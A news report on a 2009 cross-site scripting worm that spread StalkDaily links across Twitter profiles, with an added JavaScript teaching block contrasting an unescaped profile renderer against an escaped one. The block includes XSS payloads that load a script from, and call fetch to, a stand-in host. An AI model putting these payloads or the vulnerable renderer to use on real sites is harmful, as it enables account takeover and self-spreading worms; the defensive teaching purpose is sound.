Twitter worm underscores social-networking vulnerabilities
Twitter was struck by a particularly nasty cross-site scripting worm over the weekend, again bringing to light the threat of client-side attacks across social networking sites.
The Twitter worm spread links to a supposed Twitter copycat site called StalkDaily[dot]com by exploiting a cross-site scripting (XSS) vulnerability and infecting an unknown number of Twitter profiles. Each wave of the worm attacks was more intense than its predecessor, according to a post on the official Twitter blog.
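The attack the article describes is a stored cross-site scripting flaw: text that a user types into a profile field is later written into other users' pages as live HTML. The following is an added example, not code from Twitter or from the article, showing a deliberately vulnerable profile renderer beside a hardened one. The field names, the two payloads and the hostname worm.example.invalid are constructed for illustration and are not the StalkDaily worm's actual code.

```javascript
// Added example (not Twitter's code): stored XSS through unescaped profile
// fields, and the output-encoding fix. Field names, payloads and the
// hostname below are constructed for illustration.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a string for insertion into HTML text or a double-quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Encoding alone does not make an href safe: a javascript: URL survives
// escaping untouched. Allow only http(s) and fall back to a harmless anchor.
function safeHref(url) {
  try {
    const u = new URL(String(url));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '#';
  } catch (e) {
    return '#'; // not a parseable absolute URL
  }
}

// Vulnerable: user-controlled fields pasted straight into markup.
function renderProfileUnsafe(p) {
  return `<div class="profile"><h1>${p.name}</h1>` +
         `<a href="${p.url}">homepage</a><p>${p.bio}</p></div>`;
}

// Hardened: every field encoded for the context it lands in.
function renderProfileSafe(p) {
  return `<div class="profile"><h1>${escapeHtml(p.name)}</h1>` +
         `<a href="${escapeHtml(safeHref(p.url))}">homepage</a>` +
         `<p>${escapeHtml(p.bio)}</p></div>`;
}

// Demo-only detector: a real <script> tag, an on*= handler inside a real
// tag, or a javascript: URL inside an attribute. Escaped text ("&lt;img ...")
// contains no '<', so it cannot match.
function containsActiveContent(html) {
  return /<script\b/i.test(html) ||
         /<\w+[^>]*\son\w+\s*=/i.test(html) ||
         /<\w+[^>]*=\s*["']?\s*javascript:/i.test(html);
}

// Constructed attacker profile. The url breaks out of the href attribute
// with '">' and injects a remote script; the bio uses an image error handler.
const ATTACKER_PROFILE = {
  name: 'mikeyy',
  url: '"><script src="https://worm.example.invalid/w.js"></script><a href="',
  bio: '<img src=x onerror="fetch(\'https://worm.example.invalid/spread\')">',
};

// Render the same profile both ways and report whether active content leaks.
function demo(profile = ATTACKER_PROFILE) {
  const unsafe = renderProfileUnsafe(profile);
  const safe = renderProfileSafe(profile);
  return {
    unsafe,
    safe,
    unsafeActive: containsActiveContent(unsafe), // true: script tag is live
    safeActive: containsActiveContent(safe),     // false: payloads are inert text
  };
}

module.exports = { escapeHtml, safeHref, renderProfileUnsafe, renderProfileSafe, containsActiveContent, demo };
```

The point of the `safeHref` step is that contextual encoding and value validation are different controls: `escapeHtml` stops the attribute breakout, but only the scheme allowlist stops a `javascript:` link that is perfectly well-formed HTML.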
“We secured the accounts that had been compromised and removed any content that might help spread the worm,” Twitter co-founder Biz Stone wrote on the blog. “All told, we identified and deleted almost 10,000 'tweets' [messages] that could have continued to spread the worm.”
The worm's activity seems to have been contained, but there is little guarantee that no threats remain, experts said.
“This may be an open-ended problem," Andy Hayter, Anti-Malcode program manager at security solutions tester ICSA Labs, told SCMagazineUS.com on Monday. "I don't think we've seen the end of it."
But overall, the damage so far has been minimal, Stone said in his blog post. No personal information was compromised.
Richard Wang, manager of Sophos Labs U.S., recommended that Twitter users avoid clicking on untrusted links. He also told SCMagazineUS.com that Twitter can modify its platform so that it cannot support malicious code such as this.
Stone wrote: “We are still reviewing all the details, cleaning up, and we remain on alert.”
According to published reports, a 17-year-old Brooklyn, N.Y. boy has taken responsibility for the attack. Michael "Mikeyy" Mooney said he devised the malware out of boredom and to prove how vulnerable Twitter is.
Stone likened the attack to one perpetrated by Samy Kamkar, who, in 2005 when he was 19, unleashed a similar self-replicating XSS worm across MySpace that was believed to be the first of its kind. The worm was benign but enabled Kamkar to attain more than one million "friends" in 24 hours. He was later sentenced to three years probation and ordered to serve 90 days of community service.